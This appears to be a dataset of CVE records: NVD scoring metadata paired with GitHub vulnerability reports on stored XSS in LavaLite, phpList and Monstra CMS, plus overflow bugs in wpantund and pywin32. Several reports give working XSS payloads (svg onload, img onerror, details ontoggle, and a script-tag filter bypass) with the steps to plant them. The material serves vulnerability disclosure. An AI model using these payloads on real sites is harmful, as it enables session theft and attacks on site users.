**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Contact" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/contact/contact" 3. Click "New" Insert payload: ![3](https://user-images.githubusercontent.com/29293812/82797199-f4f6ea80-9ea0-11ea-8ab9-239e5f3e7e99.PNG) <svg/on<script><script>load=alert('XSS')//</script> // # "><svg/onload=prompt('XSS')> 4. Click "Save " 5. View the preview to trigger XSS. 6. View the preview to get in request and such Stored XSS **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![photo_2020-05-25_16-05-18](https://user-images.githubusercontent.com/29293812/82797647-94b47880-9ea1-11ea-95f4-6113ad9bea27.jpg) ![photo_2020-05-25_16-05-24](https://user-images.githubusercontent.com/29293812/82797653-9716d280-9ea1-11ea-903e-9efdc6b22d01.jpg) **Desktop (please complete the following information):** - OS: Windows - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Contact" feature in Lavelite.
https://api.github.com/repos/LavaLite/cms/issues/323/comments
1
2020-05-25T09:06:23Z
2022-02-02T01:27:43Z
https://github.com/LavaLite/cms/issues/323
624,158,699
323
2,141
CVE-2020-36398
2021-07-02T18:15:08.620
A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the "Campaign" field under the "Send a campaign" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/676" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/676" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "80F89BDF-79BF-4D6F-9542-F6383C37FFBD", "versionEndExcluding": null, "versionEndIncluding": "3.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/676
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Send a campaign" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/?page=send&id=3&tk=311902f27f63cc4f7466fc56ca0e916b&tab=Finish" 3. Insert payload: ![image](https://user-images.githubusercontent.com/29293812/83870606-bdb5f280-a758-11ea-98f1-cf401ace13f7.png) // # "><svg/onload=prompt(/SonGohan22/)> "><svg/onload=alert(document.domain)> 4. Click "Save and continue editing" 5. View the preview to trigger XSS. 6. View the preview to get in request and such Stored XSS. **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![phplist22](https://user-images.githubusercontent.com/29293812/83871779-e7701900-a75a-11ea-8271-c2d4fcb05339.png) ![phplist23](https://user-images.githubusercontent.com/29293812/83871874-18e8e480-a75b-11ea-8966-d44cafc05e48.png) Insert payload ![phplist24](https://user-images.githubusercontent.com/29293812/83872013-5fd6da00-a75b-11ea-83bb-4858515ec09a.png) Trigger XSS ![phplist25](https://user-images.githubusercontent.com/29293812/83872340-fe633b00-a75b-11ea-935d-99133636f850.png) ![phplist26](https://user-images.githubusercontent.com/29293812/83872343-015e2b80-a75c-11ea-8866-49b556faae39.png) ![phplist27](https://user-images.githubusercontent.com/29293812/83872350-04591c00-a75c-11ea-8535-65da08a85bd7.png) **Desktop (please complete the following information):** - OS: Ubuntu - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Send a campaign" feature in PHPList 3.5.4
https://api.github.com/repos/phpList/phplist3/issues/676/comments
2
2020-06-05T11:40:45Z
2020-06-06T19:50:39Z
https://github.com/phpList/phplist3/issues/676
631,527,235
676
2,142
CVE-2020-36399
2021-07-02T18:15:08.663
A stored cross site scripting (XSS) vulnerability in phplist 3.5.4 and below allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the "rule1" parameter under the "Bounce Rules" module.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/675" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/675" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "80F89BDF-79BF-4D6F-9542-F6383C37FFBD", "versionEndExcluding": null, "versionEndIncluding": "3.5.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/675
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
**Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Bounce rules" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the panel. 2. Go to "/admin/?page=bouncerules&type=active&tk=1af246c882c1c6096773c52216860b64" 3. Click "rule1" edit infomation rule1. 4. Insert payload: '-alert(document.domain)-' 5. Click "Save Changes" 6. View the preview to trigger XSS. 7. View the preview to get in request and such Stored XSS. **Expected behavior** The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** ![phplist](https://user-images.githubusercontent.com/29293812/83828117-1ad68780-a70a-11ea-86e3-b71dffeff51f.png) Insert payload ![phplist2](https://user-images.githubusercontent.com/29293812/83828133-2629b300-a70a-11ea-8cb2-17f8ee7f8274.png) Trigger XSS ![phplist6](https://user-images.githubusercontent.com/29293812/83828137-2c1f9400-a70a-11ea-8efa-689830c02baa.PNG) ![phplist8](https://user-images.githubusercontent.com/29293812/83828144-304bb180-a70a-11ea-96ea-4c0567ef6eaf.PNG) **Desktop (please complete the following information):** - OS: Ubuntu - Browser: Firefox - Version: 76.0.1
Cross Site Scripting Vulnerability on "Bounce rules" feature in PHPList 3.5.4
https://api.github.com/repos/phpList/phplist3/issues/675/comments
2
2020-06-05T01:57:55Z
2020-06-06T19:34:15Z
https://github.com/phpList/phplist3/issues/675
631,254,761
675
2,143
CVE-2021-33889
2021-07-02T19:15:08.217
OpenThread wpantund through 2021-07-02 has a stack-based Buffer Overflow because of an inconsistency in the integer data type for metric_len.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "baseScore": 6.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2021-0019/FEYE-2021-0019.md" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openthread/wpantund/issues/502" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/openthread/wpantund/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2021-0019/FEYE-2021-0019.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openthread/wpantund/issues/502" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/openthread/wpantund/releases" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openthread:wpantund:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF014F6D-2F93-47B2-B814-FF493EF1AF9A", "versionEndExcluding": null, "versionEndIncluding": "2021-07-02", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/openthread/wpantund/issues/502
[ "Patch", "Third Party Advisory" ]
github.com
[ "openthread", "wpantund" ]
Context: Stack buffer overflow may be triggered while writing to a variable metric_len, which is defined as unsigned short (ref: https://github.com/openthread/wpantund/blob/master/src/ncp-spinel/SpinelNCPInstance.cpp#L2180) but is considered as unsigned int (ref: https://github.com/openthread/wpantund/blob/master/third_party/openthread/src/ncp/spinel.c#L597). Expected behavior and actual behavior: Expected Behavior: Trigger an exception, because size of buffer needed, is not available. Actual Behavior: The metric_len variable triggers stack buffer overflow. Version Details: The issue was first found in wpantund: 4ae4619d7db67db8f316507ceb91879221da0c42 Affected commits: 4ae4619d7db67db8f316507ceb91879221da0c42 to bf45115f41ba2b8029eda174be2b93dea73b9261 CVE CVE-2021-33889 (Reserved)
stack-buffer-overflow in metric_len
https://api.github.com/repos/openthread/wpantund/issues/502/comments
0
2021-06-28T03:56:19Z
2021-06-28T03:56:19Z
https://github.com/openthread/wpantund/issues/502
931,140,190
502
2,144
CVE-2021-32559
2021-07-06T12:15:21.887
An integer overflow exists in pywin32 prior to version b301 when adding an access control entry (ACE) to an access control list (ACL) that would cause the size to be greater than 65535 bytes. An attacker who successfully exploited this vulnerability could crash the vulnerable process.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2021-0017/FEYE-2021-0017.md" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/issues/1700" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/pull/1701" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/fireeye/Vulnerability-Disclosures/blob/master/FEYE-2021-0017/FEYE-2021-0017.md" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/issues/1700" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/pull/1701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/mhammond/pywin32/releases" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pywin32_project:pywin32:*:*:*:*:*:*:*:*", "matchCriteriaId": "A7171765-3E9C-47EA-88F7-98B459FF6BBC", "versionEndExcluding": "b301", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/mhammond/pywin32/issues/1700
[ "Patch", "Third Party Advisory" ]
github.com
[ "mhammond", "pywin32" ]
**Context** When an ACL is resized to add an ACE, it is possible to craft an integer overflow targeting the calculated `required_size`. This results in a smaller than required buffer allocation which causes its `memcpy` of the ACL data to result in a heap overflow. **Expected behavior and actual behavior** - Expected Behavior: Throw an exception indicating that the ACE could not be added because there is not enough room left in the ACL before hitting the size limit. - Actual Behavior: The `required_size` is overflowed and the `memcpy` results in a heap overflow. **Steps to reproduce the problem** This was reproduced by adding roughly 1800 ACEs to an ACL. The exact count of ACEs that need to be added before reproducing the issue will vary based on the length of the SID in the ACE entry and the current size of the ACL being modified. Reproduction Goal: Add an ACE to an ACL such that the new size would be larger than `0xFFFF`. **Version of Python and pywin32** Tested on Python 3.5.2 with pywin32 b300 Appears to effect version b157 through b300 **CVE** CVE-2021-32559 (Reserved)
Integer overflow in PyACL
https://api.github.com/repos/mhammond/pywin32/issues/1700/comments
0
2021-05-11T20:56:14Z
2021-05-29T00:27:02Z
https://github.com/mhammond/pywin32/issues/1700
888,622,961
1,700
2,145
CVE-2020-22251
2021-07-06T20:15:07.993
Cross Site Scripting (XSS) vulnerability in phpList 3.5.3 via the login name field in Manage Administrators when adding a new admin.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/660" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phpList/phplist3/issues/660" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*", "matchCriteriaId": "2530A416-DECC-4380-9797-C61706AFAACB", "versionEndExcluding": null, "versionEndIncluding": "3.5.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpList/phplist3/issues/660
[ "Exploit", "Third Party Advisory" ]
github.com
[ "phpList", "phplist3" ]
XSS vulnerability exists in admin page while adding a new administrator in the Login name field. Steps to Reproduce: 1. Login as administrator 2. Navigate to the "Manage administrators" under config. 3. Click on "Add new admin" 4. Inject the payload in the Login name field Payload: <script>alert(1)</script> 5. Enter any other required details and click on "Save changes" POC: ![JtC4FY0f38](https://user-images.githubusercontent.com/46784458/82239827-0ac35780-9957-11ea-95ce-86654d40ade2.png)
Stored XSS vulnerability in version 3.5.3 and lower
https://api.github.com/repos/phpList/phplist3/issues/660/comments
0
2020-05-18T16:59:44Z
2020-05-19T11:21:10Z
https://github.com/phpList/phplist3/issues/660
620,364,342
660
2,146
CVE-2020-23697
2021-07-06T21:15:07.930
Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the page feature in admin/index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/463" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/463" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "A2226D9F-8476-4F0F-9DE3-21A8FE290533", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/monstra-cms/monstra/issues/463
[ "Exploit", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
Hii, Team Monstra!!! **Describe the bug** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Page" feature. **To Reproduce** Steps to reproduce the behavior: 1. Login into the panel Monstra 2. Go to 'admin/index.php' 3. Click 'Create New' -> 'Page' 4. Insert Payload XSS: "><img src=xx onerror=alert(1)> '><details/open/ontoggle=confirm("XSS")> // # "><svg/onload=prompt(1337)> <svg/on<script><script>load=alert(1337)//</script> 5. Save and Exit 6. Click 'Pages' new -> xss alert message! **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Screenshots** Infor Monstra version: ![info](https://user-images.githubusercontent.com/62001260/82693569-fac7b280-9c8b-11ea-89d2-22da38a2cbb8.PNG) Ex1 payload xss: a. Creat new page: ![insert_payload1](https://user-images.githubusercontent.com/62001260/82693879-82adbc80-9c8c-11ea-8d0d-899e98db7e21.PNG) b. click page: ![click_new_page](https://user-images.githubusercontent.com/62001260/82693906-8c372480-9c8c-11ea-9233-297f6b68bdd8.PNG) c. xss alert mess: ![xss_mess](https://user-images.githubusercontent.com/62001260/82693958-a6710280-9c8c-11ea-8816-398653dc5c88.PNG) **Desktop (please complete the following information):** OS: Windows Browser: All Version: ---- I Hope you fix it ASAP!!!!
Cross Site Script Vulnerability on "Page" in Monstra version 3.0.4
https://api.github.com/repos/monstra-cms/monstra/issues/463/comments
2
2020-05-22T17:32:50Z
2021-08-27T15:16:59Z
https://github.com/monstra-cms/monstra/issues/463
623,377,199
463
2,147
CVE-2020-23700
2021-07-07T19:15:10.167
Cross Site Scripting (XSS) vulnerability in LavaLite-CMS 5.8.0 via the Menu Links feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/319" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LavaLite/cms/issues/319" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lavalite:lavalite:5.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "B3D6757B-5BF4-402B-9A71-D79B460EC3C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/LavaLite/cms/issues/319
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LavaLite", "cms" ]
Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Menu Links" feature. This was can be bypassed by using HTML event handlers, such as "ontoggle". To Reproduce Steps to reproduce the behavior: 1. Log into the /admin. 2. Go to "/admin/menu/menu" 3. Click "Amin/User/Client" 4. Select a function then press Edit 5. Insert payload to Name: '><details/open/ontoggle=confirm(1337)> ![image](https://user-images.githubusercontent.com/50371661/82429090-98b55480-9ab5-11ea-8eb3-e353008c4d67.png) 6. Click "Save" 7. View the preview to trigger XSS. 8. View the preview to get in request and such Stored XSS ![image](https://user-images.githubusercontent.com/50371661/82429196-bbe00400-9ab5-11ea-9ece-77420e5c0d37.png) Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.
Cross Site Scripting Vulnerability on "Menu Links" feature in LavaLite 5.8.0
https://api.github.com/repos/LavaLite/cms/issues/319/comments
1
2020-05-20T09:20:04Z
2021-10-05T11:17:41Z
https://github.com/LavaLite/cms/issues/319
621,602,566
319
2,148
CVE-2020-23702
2021-07-07T19:15:10.220
Cross Site Scripting (XSS) vulnerability in PHP-Fusion 9.03.60 via 'New Shout' in /infusions/shoutbox_panel/shoutbox_admin.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2328" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://user-images.githubusercontent.com/62001260/82175522-47169980-98fe-11ea-9a8e-93622aab7cf4.PNG" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/phpfusion/PHPFusion/issues/2328" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://user-images.githubusercontent.com/62001260/82175522-47169980-98fe-11ea-9a8e-93622aab7cf4.PNG" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:php-fusion:9.03.60:*:*:*:*:*:*:*", "matchCriteriaId": "A4375E88-4C03-4C87-9835-3AEC42937686", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phpfusion/PHPFusion/issues/2328
[ "Exploit", "Third Party Advisory" ]
github.com
[ "phpfusion", "PHPFusion" ]
